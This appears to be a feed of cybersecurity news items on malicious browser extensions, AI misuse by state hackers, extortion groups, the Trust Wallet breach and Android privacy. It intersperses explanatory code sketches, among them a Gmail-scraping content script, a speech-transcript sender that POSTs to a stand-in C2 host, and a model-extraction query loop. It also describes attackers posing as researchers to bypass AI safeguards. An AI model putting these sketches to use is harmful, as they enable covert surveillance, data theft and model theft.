- A1: Used to retrieve attacker-issued commands and update status responses (e.g., S-C-R or Server-Command-Success)
- A2–An: Facilitates the transfer of data such as command outputs and files
- V1: Stores system-related data from the compromised endpoint
Researchers at browser security platform LayerX uncovered the malicious extension campaign and labelled it AiFrame. They determined that all of the studied extensions belong to the same operation because they communicate with infrastructure under a single domain, tapnetic[.]pro.
The most popular extension in the AiFrame operation, named Gemini AI Sidebar (fppbiomdkfbhgjjdmojlogeceejinadg), had 80,000 users, but it is no longer available in the Chrome Web Store.
According to BleepingComputer, other extensions with more than a thousand users each are still live in Google's Chrome Web Store. The names vary, but the extensions are functionally the same.
LayerX found that all 30 extensions share the same JavaScript logic, permissions, internal structure, and backend infrastructure.
The malicious browser add-ons do not implement their AI functionality locally. That is risky because the publishers can change an extension's logic server-side without shipping an update, much as Microsoft Office Add-ins can, letting them evade a fresh store review.
Beyond that, the extensions extract page content from the sites users visit, including verification pages, using Mozilla's Readability library.
According to LayerX, a group of 15 extensions exclusively targets Gmail data by injecting UI components with a content script that executes at "document_start" on "mail.google.com." The script reads visible email content straight from the DOM, repeatedly retrieving email thread text via ".textContent"; even email drafts can be captured, according to the researchers. "The extracted email content is passed into the extension's logic and transmitted to third-party backend infrastructure controlled by the extension operator when Gmail-related features like AI-assisted replies or summaries are invoked," LayerX said in a report released today.
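To make that pattern concrete, here is a minimal, hypothetical sketch of a content script polling the Gmail DOM and joining message text via `.textContent`. The `.a3s` selector, the polling interval, and the debug logging are illustrative assumptions, not details published by LayerX.

```ts
// Sketch of the reported pattern: a content script (declared with
// "run_at": "document_start" for mail.google.com) reading visible email
// text straight from the DOM. Selectors here are assumptions.
function scrapeOpenThread(): string {
  // '.a3s' is a commonly observed Gmail message-body class, assumed here.
  const bodies = document.querySelectorAll('.a3s');
  return Array.from(bodies)
    .map((el) => el.textContent ?? '')
    .join('\n---\n');
}

// Poll the DOM, mirroring the "repeatedly retrieves" behaviour in the report.
setInterval(() => {
  const text = scrapeOpenThread();
  if (text.trim().length > 0) {
    // In the reported campaign, this text was forwarded to operator-controlled
    // backend infrastructure when the AI features were invoked.
    console.debug('captured thread, length:', text.length);
  }
}, 5_000);
```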
Additionally, the extensions include a mechanism for remotely triggering speech recognition and transcript creation via the "Web Speech API," delivering the results to the operators (see the sketch below). Depending on the permissions granted, the extensions could potentially capture conversations from the victim's surroundings. Google had not responded to BleepingComputer's request for comment on LayerX's findings by the time of publication. For the full list of malicious extensions, consult LayerX's indicators of compromise. Users should reset the passwords for all affected accounts if an intrusion is confirmed.
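The speech-recognition mechanism mentioned above relies on a standard browser API. Below is a hedged sketch of what such usage could look like; only the recognition calls are real browser API, while the reporting endpoint and trigger wiring are hypothetical placeholders.

```ts
// Hedged sketch: transcription via the public Web Speech API, as described
// in the report. The exfiltration endpoint below is a made-up placeholder.
const SpeechRecognitionImpl =
  (window as any).SpeechRecognition ?? (window as any).webkitSpeechRecognition;

const recognizer = new SpeechRecognitionImpl();
recognizer.continuous = true;      // keep listening across utterances
recognizer.interimResults = false; // deliver only finalized transcripts

recognizer.onresult = (event: any) => {
  // Collect the transcript text from each finalized recognition result.
  const transcript = Array.from(event.results as ArrayLike<any>)
    .map((result: any) => result[0].transcript)
    .join(' ');
  // Hypothetical reporting call standing in for the operators' backend.
  void fetch('https://c2.example.invalid/transcript', {
    method: 'POST',
    body: JSON.stringify({ transcript }),
  });
};

// Starting recognition requires microphone permission to have been granted,
// which is why the report notes the outcome depends on granted permissions.
recognizer.start();
```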
Cybersecurity investigators at Google have confirmed that state-sponsored hacking groups are actively relying on generative artificial intelligence to improve how they research targets, prepare cyber campaigns, and develop malicious tools. According to the company’s threat intelligence teams, North Korea–linked attackers were observed using the firm’s AI platform, Gemini, to collect and summarize publicly available information about organizations and employees they intended to target. This type of intelligence gathering allows attackers to better understand who works at sensitive companies, what technical roles exist, and how to approach victims in a convincing way.
Investigators explained that the attackers searched for details about leading cybersecurity and defense companies, along with information about specific job positions and salary ranges. These insights help threat actors craft more realistic fake identities and messages, often impersonating recruiters or professionals to gain the trust of their targets. Security experts warned that this activity closely resembles legitimate professional research, which makes it harder for defenders to distinguish normal online behavior from hostile preparation.
The hacking group involved, tracked as UNC2970, is linked to North Korea and overlaps with a network widely known as Lazarus Group. This group has previously run a long-term operation in which attackers pretended to offer job opportunities to professionals in aerospace, defense, and energy companies, only to deliver malware instead. Researchers say this group continues to focus heavily on defense-related targets and regularly impersonates corporate recruiters to begin contact with victims.
The misuse of AI is not limited to one actor. Multiple hacking groups connected to China and Iran were also found using AI tools to support different phases of their operations. Some groups used AI to gather targeted intelligence, including collecting email addresses and account details. Others relied on AI to analyze software weaknesses, prepare technical testing plans, interpret documentation from open-source tools, and debug exploit code. Certain actors used AI to build scanning tools and malicious web shells, while others created fake online identities to manipulate individuals into interacting with them. In several cases, attackers claimed to be security researchers or competition participants in order to bypass safety restrictions built into AI systems.
Researchers also identified malware that directly communicates with AI services to generate harmful code during an attack. One such tool, HONESTCUE, requests programming instructions from AI platforms and receives source code that is used to build additional malicious components on the victim’s system. Instead of storing files on disk, this malware compiles and runs code directly in memory using legitimate system tools, making detection and forensic analysis more difficult. Separately, investigators uncovered phishing kits designed to look like cryptocurrency exchanges. These fake platforms were built using automated website creation tools from Lovable AI and were used to trick victims into handing over login credentials. Parts of this activity were linked to a financially motivated group known as UNC5356.
Security teams also reported an increase in so-called ClickFix campaigns. In these schemes, attackers use public sharing features on AI platforms to publish convincing step-by-step guides that appear to fix common computer problems. In reality, these instructions lead users to install malware that steals personal and financial data. This trend was first flagged in late 2025 by Huntress.
Another growing threat involves model extraction attacks. In these cases, adversaries repeatedly query proprietary AI systems in order to observe how they respond and then train their own models to imitate the same behavior. In one large campaign, attackers sent more than 100,000 prompts to replicate how an AI model reasons across many tasks in different languages. Researchers at Praetorian demonstrated that a functional replica could be built using a relatively small number of queries and limited training time. Experts warned that keeping AI model parameters secret is not enough, because every response an AI system provides can be used as training data for attackers.
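To illustrate how little machinery such an attack needs, here is a hypothetical Node/TypeScript sketch that assumes an OpenAI-compatible chat endpoint and simply records prompt/response pairs as distillation training data. The endpoint, model name, environment variable, and file paths are all invented for the example.

```ts
// Hypothetical model-extraction loop: replay a prompt list against a target
// model and save each (prompt, answer) pair as a distillation example.
import { appendFileSync, readFileSync } from 'node:fs';

const ENDPOINT = 'https://api.example.invalid/v1/chat/completions'; // assumed
const API_KEY = process.env.TARGET_API_KEY ?? '';                   // assumed

async function collectPair(prompt: string): Promise<void> {
  const res = await fetch(ENDPOINT, {
    method: 'POST',
    headers: {
      Authorization: `Bearer ${API_KEY}`,
      'Content-Type': 'application/json',
    },
    body: JSON.stringify({
      model: 'target-model', // assumed model identifier
      messages: [{ role: 'user', content: prompt }],
    }),
  });
  const data = await res.json();
  const answer = data.choices?.[0]?.message?.content ?? '';
  // Each line of distill.jsonl becomes one training example for the replica.
  appendFileSync('distill.jsonl', JSON.stringify({ prompt, answer }) + '\n');
}

async function main(): Promise<void> {
  const prompts = readFileSync('prompts.txt', 'utf8').split('\n').filter(Boolean);
  for (const prompt of prompts) {
    await collectPair(prompt); // the reported campaign sent 100,000+ of these
  }
}

void main();
```

This is why researchers warn that every response a model produces is potential training data: the "attack" is nothing more exotic than patient, large-scale querying.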
Google, which launched its AI Cyber Defense Initiative in 2024, stated that artificial intelligence is increasingly amplifying the capabilities of cybercriminals by improving their efficiency and speed. Company representatives cautioned that as attackers integrate AI into routine operations, the volume and sophistication of attacks will continue to rise. Security specialists argue that defenders must adopt similar AI-powered tools to automate threat detection, accelerate response times, and operate at the same machine-level speed as modern attacks.
Cybersecurity experts have found 17 extensions for Chrome, Edge, and Firefox that track users' internet activity and install backdoors for remote access. The extensions were downloaded more than 840,000 times.
The campaign is not new. LayerX says it is part of GhostPoster, a campaign first documented by Koi Security last December. At the time, researchers identified 17 extensions, downloaded more than 50,000 times, that showed the same monitoring behaviour and deployed the same backdoors.
Some of the extensions in the new batch were uploaded as early as 2020, exposing users to the malware for years. The extensions appeared first in the Edge store and later expanded to Firefox and Chrome.
Some of the extensions hid malicious JavaScript code inside their PNG logo. The code amounts to instructions for downloading the main payload from a remote server.
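The attackers' exact encoding has not been published, but a defender can cheaply triage a suspicious logo: a well-formed PNG ends eight bytes after the start of the IEND chunk type, so any trailing bytes deserve a manual look. A minimal Node/TypeScript sketch, with the file name assumed:

```ts
// Triage check: report bytes appended after a PNG's IEND chunk, a common
// hiding spot for smuggled payloads. This is a review aid, not a detector
// for the specific encoding used in this campaign.
import { readFileSync } from 'node:fs';

function bytesAfterIend(path: string): number {
  const buf = readFileSync(path);
  const iend = buf.indexOf(Buffer.from('IEND', 'ascii'));
  if (iend === -1) return -1; // no IEND chunk: not a well-formed PNG
  // After the 4-byte "IEND" type comes a 4-byte CRC; the file should end there.
  const expectedEnd = iend + 4 + 4;
  return buf.length - expectedEnd;
}

const trailing = bytesAfterIend('logo.png'); // hypothetical extension asset
if (trailing > 0) {
  console.warn(`logo.png carries ${trailing} byte(s) after IEND; inspect manually`);
}
```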
The main payload does several things. It can hijack affiliate links on popular e-commerce websites, stealing commissions from content creators and influencers. “The malware watches for visits to major e-commerce platforms. When you click an affiliate link on Taobao or JD.com, the extension intercepts it. The original affiliate, whoever was supposed to earn a commission from your purchase, gets nothing. The malware operators get paid instead,” said Koi researchers.
It then injects Google Analytics tracking into every page the victim opens and removes security headers from HTTP responses.
Finally, it bypasses CAPTCHAs in three different ways and deploys invisible iframes that carry out ad fraud, click fraud, and tracking. The iframes disappear after 15 seconds.
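One cheap tripwire for the header-stripping behaviour: fetch a same-origin page whose security headers are known to be set server-side and check whether they survive in the browser. A hedged sketch, with the URL and expected header set as assumptions:

```ts
// Tripwire for in-browser header stripping: request a same-origin page whose
// security headers are known to be set server-side, then verify they arrived.
const EXPECTED_HEADERS = ['content-security-policy', 'x-frame-options'];

async function missingSecurityHeaders(url: string): Promise<string[]> {
  const res = await fetch(url, { method: 'HEAD' });
  // A header the server always sends but the browser never sees suggests
  // something local (an extension, a proxy) removed it from the response.
  return EXPECTED_HEADERS.filter((name) => !res.headers.has(name));
}

missingSecurityHeaders('/').then((missing) => {
  if (missing.length > 0) {
    console.warn('security headers stripped in transit:', missing);
  }
});
```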
All of the extensions have since been removed from the repositories, but users who installed them still need to remove them manually.
“This staged execution flow demonstrates a clear evolution toward longer dormancy, modularity, and resilience against both static and behavioral detection mechanisms,” said LayerX.
Some of the extensions employ the PNG steganography technique. Others download JavaScript directly and inject it into every page the victim visits. Still others use bespoke ciphers to encode their C&C domains and hide eval() calls. Same attacker, identical servers, many delivery methods: the operators appear to be testing several strategies to see which gets the most installs, evades detection the longest, and makes the most money.
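For analysts reviewing an unpacked extension, two of these traits, hidden eval() calls and long encoded strings, are easy to flag statically. A rough Node/TypeScript triage sketch; the directory name and thresholds are arbitrary assumptions:

```ts
// Flag extension scripts containing eval() calls or long opaque literals,
// two traits of the delivery variants described above. Heuristic only.
import { readdirSync, readFileSync, statSync } from 'node:fs';
import { join } from 'node:path';

function* walkJsFiles(dir: string): Generator<string> {
  for (const name of readdirSync(dir)) {
    const p = join(dir, name);
    if (statSync(p).isDirectory()) yield* walkJsFiles(p);
    else if (p.endsWith('.js')) yield p;
  }
}

for (const file of walkJsFiles('./unpacked-extension')) {
  const src = readFileSync(file, 'utf8');
  const hasEval = /\beval\s*\(/.test(src);
  // Long unbroken base64-ish literals often hide encoded payloads or domains.
  const hasOpaqueBlob = /["'][A-Za-z0-9+/=]{200,}["']/.test(src);
  if (hasEval || hasOpaqueBlob) {
    console.log(`${file}: eval=${hasEval} longEncodedLiteral=${hasOpaqueBlob}`);
  }
}
```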
This campaign reflects a deliberate shift toward patience and precision. By embedding malicious code in images, delaying execution, and rotating delivery techniques across identical infrastructure, the attackers test which methods evade detection longest. The strategy favors longevity and profit over speed, exposing how browser ecosystems remain vulnerable to quietly persistent threats.
Google-owned Mandiant's threat intelligence team is tracking the attacks under several clusters: UNC6661, UNC6671, and UNC6240 (aka ShinyHunters). The gangs appear to be refining their tactics. "While this methodology of targeting identity providers and SaaS platforms is consistent with our prior observations of threat activity preceding ShinyHunters-branded extortion, the breadth of targeted cloud platforms continues to expand as these threat actors seek more sensitive data for extortion," Mandiant said.
"Further, they appear to be escalating their extortion tactics with recent incidents, including harassment of victim personnel, among other tactics.”
In mid-January 2026, UNC6661 was observed impersonating IT staff and directing employees to credential-harvesting links, tricking them into changing their multi-factor authentication (MFA) settings.
The threat actors used the stolen credentials to register their own devices for MFA and then steal data from SaaS platforms. In one incident, the hackers exploited their access to compromised email accounts to send further phishing emails to users at cryptocurrency-focused organizations.
The emails were later deleted to cover their tracks. Since the start of this year, experts have also observed UNC6671 mimicking IT staff to trick victims into entering credentials and MFA login codes on credential-harvesting websites. In a few incidents, the hackers gained access to Okta accounts.
UNC6671 leveraged PowerShell to steal sensitive data from OneDrive and SharePoint.
Two main differences separate UNC6661 and UNC6671: they registered their credential-harvesting domains through different registrars (NICENIC for UNC6661, Tucows for UNC6671), and an extortion email sent after UNC6671 activity did not overlap with known UNC6240 indicators.
This suggests that additional groups may be involved, underscoring how nebulous these cybercrime organizations are. Furthermore, the targeting of cryptocurrency companies suggests the threat actors are searching for new ways to monetize their access.
Google has updated its Chrome browser with a built-in artificial intelligence panel powered by its Gemini model, marking a step toward automated web interaction. The change reflects the company’s broader push to integrate AI directly into everyday browsing.
Chrome, which currently holds more than 70 percent of the global browser market, is now moving in the same direction as other browsers that have already experimented with AI-driven navigation. The idea behind this shift is to allow users to rely on AI systems to explore websites, gather information, and perform online actions with minimal manual input.
The Gemini feature appears as a sidebar within Chrome, reducing the visible area of websites to make room for an interactive chat interface. Through this panel, users can communicate with the AI while keeping their main work open in a separate tab, allowing multitasking without constant tab switching.
Google explains that this setup can help users organize information more effectively. For example, Gemini can compare details across multiple open tabs or summarize reviews from different websites, helping users make decisions more quickly.
For subscribers to Google’s higher-tier AI plans, Chrome now offers an automated browsing capability. This allows Gemini to act as a software agent that can follow instructions involving multiple steps. In demonstrations shared by Google, the AI can analyze images on a webpage, visit external shopping platforms, identify related products, and add items to a cart while staying within a user-defined budget. The final purchase, however, still requires user approval.
The browser update also includes image-focused AI tools that allow users to create or edit images directly within Chrome, further expanding the browser’s role beyond simple web access.
Chrome’s integration with other applications has also been expanded. With user consent, Gemini can now interact with productivity tools, communication apps, media services, navigation platforms, and shopping-related Google services. This gives the AI broader context when assisting with tasks.
Google has indicated that future updates will allow Gemini to remember previous interactions across websites and apps, provided users choose to enable this feature. The goal is to make AI assistance more personalized over time.
Despite these developments, automated browsing faces resistance from some websites. Certain platforms have already taken legal or contractual steps to limit AI-driven activity, particularly for shopping and transactions. This underlines the ongoing tension between automation and website control.
To address these concerns, Google says Chrome will request human confirmation before completing sensitive actions such as purchases or social media posts. The browser will also support an open standard designed to allow AI-driven commerce in collaboration with participating retailers.
Currently, these features are available on Chrome for desktop systems in the United States, with automated browsing restricted to paid subscribers. How widely such AI-assisted browsing will be accepted across the web remains uncertain.
Although advanced spyware attacks do not affect most smartphone users, cybersecurity researchers stress that awareness is essential as these tools continue to spread globally. Even individuals who are not public figures are advised to remain cautious.
In December, hundreds of iPhone and Android users received official threat alerts stating that their devices had been targeted by spyware. Shortly after these notifications, Apple and Google released security patches addressing vulnerabilities that experts believe were exploited to install the malware on a small number of phones.
Spyware poses an extreme risk because it allows attackers to monitor nearly every activity on a smartphone. This includes access to calls, messages, keystrokes, screenshots, notifications, and even encrypted platforms such as WhatsApp and Signal. Despite its intrusive capabilities, spyware is usually deployed in targeted operations against journalists, political figures, activists, and business leaders in sensitive industries.
High-profile cases have demonstrated the seriousness of these attacks. Former Amazon chief executive Jeff Bezos and Hanan Elatr, the wife of murdered Saudi dissident Jamal Khashoggi, were both compromised through Pegasus spyware developed by the NSO Group. These incidents illustrate how personal data can be accessed without user awareness.
Spyware activity remains concentrated within these circles, but researchers suggest its reach may be expanding. In early December, Google issued threat notifications and disclosed findings showing that an exploit chain had been used to silently install Predator spyware. Around the same time, the U.S. Cybersecurity and Infrastructure Security Agency warned that attackers were actively exploiting mobile messaging applications using commercial surveillance tools.
One of the most dangerous techniques involved is known as a zero-click attack. In such cases, a device can be infected without the user clicking a link, opening a message, or downloading a file. According to Malwarebytes researcher Pieter Arntz, once infected, attackers can read messages, track keystrokes, capture screenshots, monitor notifications, and access banking applications. Rocky Cole of iVerify adds that spyware can also extract emails and texts, steal credentials, send messages, and access cloud accounts.
Spyware may also spread through malicious links, fake applications, infected images, browser vulnerabilities, or harmful browser extensions. Recorded Future’s Richard LaTulip notes that recent research into malicious extensions shows how tools that appear harmless can function as surveillance mechanisms. These methods, often associated with nation-state actors, are designed to remain hidden and persistent.
Governments and spyware vendors frequently claim such tools are used only for law enforcement or national security. However, Amnesty International researcher Rebecca White states that journalists, activists, and others have been unlawfully targeted worldwide, using spyware as a method of repression. Thai activist Niraphorn Onnkhaow was targeted multiple times during pro-democracy protests between 2020 and 2021, eventually withdrawing from activism due to fears her data could be misused.
Detecting spyware is challenging. Devices may show subtle signs such as overheating, performance issues, or unexpected camera or microphone activation. Official threat alerts from Apple, Google, or Meta should be treated seriously. Leaked private information can also indicate compromise.
To reduce risk, Apple offers Lockdown Mode, which limits certain functions to reduce attack surfaces. Apple security executive Ivan Krstić states that widespread iPhone malware has not been observed outside mercenary spyware campaigns. Apple has also introduced Memory Integrity Enforcement, an always-on protection designed to block memory-based exploits.
Google provides Advanced Protection for Android, enhanced in Android 16 with intrusion logging, USB safeguards, and network restrictions.
Experts recommend avoiding unknown links, limiting app installations, keeping devices updated, avoiding sideloading, and restarting phones periodically. However, confirmed infections often require replacing the device entirely. Organizations such as Amnesty International, Access Now, and Reporters Without Borders offer assistance to individuals who believe they have been targeted.
Security specialists advise staying cautious without allowing fear to disrupt normal device use.
Trust Wallet said in a post on X: “We’ve identified a security incident affecting Trust Wallet Browser Extension version 2.68 only. Users with Browser Extension 2.68 should disable and upgrade to 2.69.”
Binance founder Changpeng Zhao (CZ) assured users that the company is investigating how threat actors were able to compromise the new version.
“Mobile-only users and browser extension versions are not impacted. User funds are SAFE,” Zhao wrote in a post on X.
The compromise happened because of a flaw in a version of the Trust Wallet Google Chrome browser extension.
For users affected by the Browser Extension v2.68 compromise, Trust Wallet posted the following guidance on its X account:
“Please wait to open the Browser Extension until you have updated to Extension version 2.69. This helps safeguard the security of your wallet and avoids possible problems.”
Social media users voiced their frustration. One said, “The problem has been going on for several hours,” while another complained that the company “must explain what happened and compensate all users affected. Otherwise reputation is tarnished.” A third asked, “How did the vulnerability in version 2.68 get past testing, and what changes are being made to prevent similar issues?”
Google is reportedly preparing to extend a smart assistance feature beyond its Pixel smartphones to the wider Android ecosystem. The functionality, referred to as Contextual Suggestions, closely resembles Magic Cue, a software feature currently limited to Google’s Pixel 10 lineup. Early signs suggest the company is testing whether this experience can work reliably across a broader range of Android devices.
Contextual Suggestions is designed to make everyday phone interactions more efficient by offering timely prompts based on a user’s regular habits. Instead of requiring users to manually open apps or repeat the same steps, the system aims to anticipate what action might be useful at a given moment. For example, if someone regularly listens to a specific playlist during workouts, their phone may suggest that music when they arrive at the gym. Similarly, users who cast sports content to a television at the same time every week may receive an automatic casting suggestion at that familiar hour.
According to Google’s feature description, these suggestions are generated using activity patterns and location signals collected directly on the device. This information is stored within a protected, encrypted environment on the phone itself. Google states that the data never leaves the device, is not shared with apps, and is not accessible to the company unless the user explicitly chooses to share it for purposes such as submitting a bug report.
Within this encrypted space, on-device artificial intelligence analyzes usage behavior to identify recurring routines and predict actions that may be helpful. While apps and system services can present the resulting suggestions, they do not gain access to the underlying data used to produce them. Only the prediction is exposed, not the personal information behind it.
Privacy controls are a central part of the feature’s design. Contextual data is automatically deleted after 60 days by default, and users can remove it sooner through a “Manage your data” option. The entire feature can also be disabled for those who prefer not to receive contextual prompts at all.
Contextual Suggestions has begun appearing for a limited number of users running the latest beta version of Google Play Services, although access remains inconsistent even among beta testers. This indicates that the feature is still under controlled testing rather than a full rollout. When available, it appears under Settings > Google or Google Services > All Services > Others.
Google has not yet clarified which apps support Contextual Suggestions. Based on current observations, functionality may be restricted to system-level or Google-owned apps, though this has not been confirmed. The company also mentions the use of artificial intelligence but has not specified whether older or less powerful devices will be excluded due to hardware limitations.
As testing continues, further details are expected to emerge regarding compatibility, app support, and wider availability. For now, Contextual Suggestions reflects Google’s effort to balance convenience with on-device privacy, while cautiously evaluating how such features perform across the diverse Android ecosystem.
Google recently announced the launch of its Emergency Location Service (ELS) in India for compatible Android smartphones. Users in an emergency can call or text emergency service providers such as police, firefighters, and healthcare professionals, and ELS shares their accurate location immediately.
Uttar Pradesh (UP) has become the first Indian state to operationalise ELS for Android devices. ELS was rolled out earlier to devices running Android 6 or newer; for it to work, however, state authorities must integrate it with their emergency services.
ELS collects information from the device's GPS, Wi-Fi, and cellular networks to pinpoint the user's location with an accuracy of up to 50 meters, and shares it by call or SMS with providers such as firefighters, police, and medical personnel. Local wireless and emergency infrastructure operators must enable support for the capability, which is why Uttar Pradesh is so far the only state to have "fully" operationalized the service.
The state police, in partnership with Pert Telecom Solutions, have integrated ELS with the emergency number 112. The service is free and only reports a user's position when an Android phone dials 112.
Google added that all suitable handsets running Android 6.0 and later versions now have access to the ELS functionality.
Google says ELS in Android has supported over 20 million calls and SMS messages to date, and can deliver a location even if a call drops within seconds of being answered. ELS is powered by Android's Fused Location Provider, which Google describes as a machine learning-based tool.
According to Google, the feature is available only to emergency service providers, and the company never collects or shares accurate location data for its own use. ELS data is sent directly to the concerned authority alone.
Recently, Google also launched the Emergency Live Video feature for Android devices. It lets users share their camera feed with a responder during an emergency call or SMS. The emergency service provider must first get the user's approval: when the responder requests video, a prompt appears on the user's screen, and the user can accept and share a visual feed or reject the request.
Trust Wallet recently disclosed that the Shai-Hulud supply chain attack last November may be responsible for the compromise of its Google Chrome extension, which led to the theft of $8.5 million in assets.
According to the company, its "developer GitHub secrets were exposed in the attack, which gave the attacker access to our browser extension source code and the Chrome Web Store (CWS) API key. The attacker obtained full CWS API access via the leaked key, allowing builds to be uploaded directly without Trust Wallet's standard release process, which requires internal approval/manual review."
The threat actor then registered the domain "metrics-trustwallet[.]com" and deployed a malicious variant of the extension with a backdoor that exfiltrated users' wallet mnemonic phrases to the subdomain "api.metrics-trustwallet[.]com."
According to cybersecurity company Koi, the infected code activates on every wallet unlock, harvesting sensitive data. It makes no difference whether victims used biometrics or a password, or whether the wallet extension was opened once after the 2.68 update or used for months.
The researchers Yuval Ronen and Oren Yomtov reported that, "the code loops through every wallet in the user's account, not just the active one. If you had multiple wallets configured, all of them were compromised. Seed phrases are stuffed into a field called errorMessage inside what looks like standard unlock telemetry. A casual code review sees an analytics event tracking unlock success with some error metadata."
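Defenders inspecting extension traffic can hunt for exactly this disguise: string fields whose contents look like a BIP-39 mnemonic. A simplified TypeScript sketch follows; a real scanner would also verify each word against the 2048-word BIP-39 list, which is omitted here.

```ts
// Heuristic: does a string look like a BIP-39 seed phrase? Valid mnemonics
// are 12/15/18/21/24 short lowercase words (each 3-8 letters).
function looksLikeMnemonic(value: string): boolean {
  const words = value.trim().toLowerCase().split(/\s+/);
  if (![12, 15, 18, 21, 24].includes(words.length)) return false;
  return words.every((w) => /^[a-z]{3,8}$/.test(w));
}

// Recursively scan every string field of a captured telemetry object and
// return the paths of fields that resemble seed phrases.
function scanTelemetry(value: unknown, path = ''): string[] {
  if (typeof value === 'string') {
    return looksLikeMnemonic(value) ? [path] : [];
  }
  if (value !== null && typeof value === 'object') {
    return Object.entries(value).flatMap(([key, child]) =>
      scanTelemetry(child, path ? `${path}.${key}` : key),
    );
  }
  return [];
}

// Example event mimicking the disguised shape from the report: a seed
// phrase smuggled inside what looks like routine unlock telemetry.
const event = {
  type: 'unlock',
  success: true,
  errorMessage:
    'abandon ability able about above absent absorb abstract absurd abuse access accident',
};
console.log(scanTelemetry(event)); // -> ['errorMessage']
```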
The analysis also revealed that querying the server directly returned the reply "He who controls the spice controls the universe," a Dune reference also seen in related incidents such as the Shai-Hulud npm attack. "The Last-Modified header reveals the infrastructure was staged by December 8 – over two weeks before the malicious update was pushed on December 24," it added. "This wasn't opportunistic. It was planned."
The findings came after Trust Wallet asked the one million users of its Chrome extension to update to version 2.69, after unknown hackers pushed a malicious update (version 2.68) to the browser's extension marketplace on December 24, 2025.
The breach resulted in $8.5 million worth of cryptocurrency assets being stolen from 2,520 wallet addresses. The thefts were first reported shortly after the malicious update went live.
Post-incident, Trust Wallet has started a reimbursement claims process for affected victims and implemented additional monitoring around its release processes.
The Indian government is pushing a telecom industry proposal that would compel smartphone companies to enable satellite-based location tracking that stays active 24x7 for surveillance.
Tech giants Samsung, Google, and Apple have opposed the move over privacy concerns. Privacy debates flared in India after the government was forced to repeal an order mandating that smartphone companies pre-install a state-run cyber safety application on all devices, with activists and the opposition raising concerns about possible spying.
The government has been concerned that agencies do not receive accurate locations when legal requests are sent to telecom companies during investigations. Carriers currently rely on cellular tower data, which provides only an estimated area and can be inaccurate.
The Cellular Operators Association of India (COAI), which represents Bharti Airtel and Reliance Jio, suggested that accurate user locations could be provided if the government mandated smartphone firms to turn on A-GPS technology, which combines cellular data and satellite signals.
If implemented, location services would be permanently activated on smartphones with no option to disable them. Samsung, Google, and Apple strongly oppose the proposal. According to the India Cellular & Electronics Association (ICEA), a lobbying group representing Google and Apple, no comparable user-location-tracking mandate exists anywhere else in the world.
Reuters reached out to India's IT and home ministries for clarity on the telecom industry's proposal but received no reply. According to digital forensics expert Junade Ali, the "proposal would see phones operate as a dedicated surveillance device."
According to technology experts, A-GPS, which is normally activated only when specific apps are running or emergency calls are being made, could give authorities location data accurate enough to track a person to within a meter.
Globally, governments are constantly looking for new ways to track the movements and data of mobile users; all Russian mobile phones, for example, are mandated to ship with a state-sponsored communications app installed. With 735 million smartphones as of mid-2025, India is the second-largest mobile market in the world.
According to Counterpoint Research, more than 95% of these gadgets are running Google's Android operating system, while the remaining phones are running Apple's iOS.
Apple and Google cautioned that their user bases include members of the armed forces, judges, business executives, and journalists, and that the proposed location tracking would jeopardize their security because their devices store sensitive data.
According to the telecom industry, even the outdated method of location tracking is becoming troublesome because smartphone manufacturers notify users via pop-up messages that their "carrier is trying to access your location."
Microsoft stirred controversy when it revealed a Teams update that could tell your organization when you're not at work. Now Google has done something similar. Say goodbye to end-to-end encryption: with the new RCS and SMS Android update, your RCS and SMS texts are no longer private.
According to Android Authority, "Google is rolling out Android RCS Archival on Pixel (and other Android) phones, allowing employers to intercept and archive RCS chats on work-managed devices. In simpler terms, your employer will now be able to read your RCS chats in Google Messages despite end-to-end encryption.”
This only applies to work-managed devices and doesn't affect personal ones. In regulated industries, it merely adds RCS archiving to existing SMS archiving. Within an organization, however, texting is different from emailing: employees sometimes share details of their non-work lives over text. End-to-end encryption kept those conversations safe, but that will no longer be the case.
There is a lot of misunderstanding around end-to-end encryption. It protects messages in transit, but once they arrive on your device they are decrypted, and whoever controls the device can read them.
According to Google, this is "a dependable, Android-supported solution for message archival, which is also backwards compatible with SMS and MMS messages as well. Employees will see a clear notification on their device whenever the archival feature is active.”
With this update, getting a phone at work is no longer as good a perk as it seems. Employees have always been wary of over-sharing on email, which is easy to monitor; texts felt safe. The update changes that. According to Google, “this new capability, available on Google Pixel and other compatible Android Enterprise devices gives your employees all the benefits of RCS — like typing indicators, read receipts, and end-to-end encryption between Android devices — while ensuring your organization meets its regulatory requirements.”
Because of organizational surveillance, employees sometimes turn to shadow IT tools such as WhatsApp and Signal to communicate with colleagues. The new Google update will only make that worse.
“Earlier,” Google said, “employers had to block the use of RCS entirely to meet these compliance requirements; this update simply allows organizations to support modern messaging — giving employees messaging benefits like high-quality media sharing and typing indicators — while maintaining the same compliance standards that already apply to SMS messaging.”
A recent Android update marks a fundamental change in how text messages are handled on employer-controlled devices. Google has introduced a feature called Android RCS Archival, which lets organisations capture and store all RCS, SMS, and MMS communications sent through Google Messages on fully managed work phones. While messages remain encrypted in transit, they can now be accessed on the device itself once delivered.
This update is designed to help companies meet compliance and record-keeping requirements, especially in sectors that must retain communication logs for regulatory reasons. Until now, many organizations had blocked RCS entirely because of its encryption, which made it difficult to archive. The new feature gives them a way to support richer messaging while still preserving mandatory records.
Archiving occurs via authorized third-party software that integrates directly with Google Messages on work-managed devices. Once enabled by a company's IT team, the software logs every interaction in a conversation, including messages received, sent, edited, or later deleted. Employees using these devices see a notification when archiving is active, signaling that their conversations are being logged.
Google has indicated that this functionality applies only to work-managed Android devices; personal phones and personal profiles are not affected, and the update does not give employers access to user data on privately owned devices. The feature must also be intentionally switched on by the organisation; it is not enabled automatically.
The update also surfaces a common misconception about encrypted messaging: end-to-end encryption protects content only while it is in transit between devices. When a message lands on a device owned and administered by an employer, the organization has the technical ability to capture it. The archival feature does not extend to over-the-top platforms such as WhatsApp or Signal, which manage their own encryption, though those apps can expose data too when backups are unencrypted or the device itself is compromised.
This change also raises a broader issue: one of counterparty risk. A conversation remains private only if both ends of it are stored securely. Screenshots, unsafe backups, and linked devices outside the encrypted environment can all leak message content. Work-phone archiving now becomes part of that wider set of risks users should be aware of.
For employees, the takeaway is clear: A company-issued phone is a workplace tool, not a private device. Any communication that originates from a fully managed device can be archived, meaning personal conversations should stay on a personal phone. Users reliant on encrypted platforms have reason to review their backup settings and steer clear of mixing personal communication with corporate technology.
Google's new archival option gives organisations a compliance solution that brings RCS in line with traditional SMS logging, while for workers it is a further reminder that privacy expectations shift the moment a device is brought under corporate management.
An ongoing security incident at Gainsight's customer-management platform has raised fresh alarms about how deeply third-party integrations can affect cloud environments. The breach centers on compromised OAuth tokens connected with Gainsight's Salesforce connectors, and it remains unclear how many organizations were touched and what type of information was accessed.
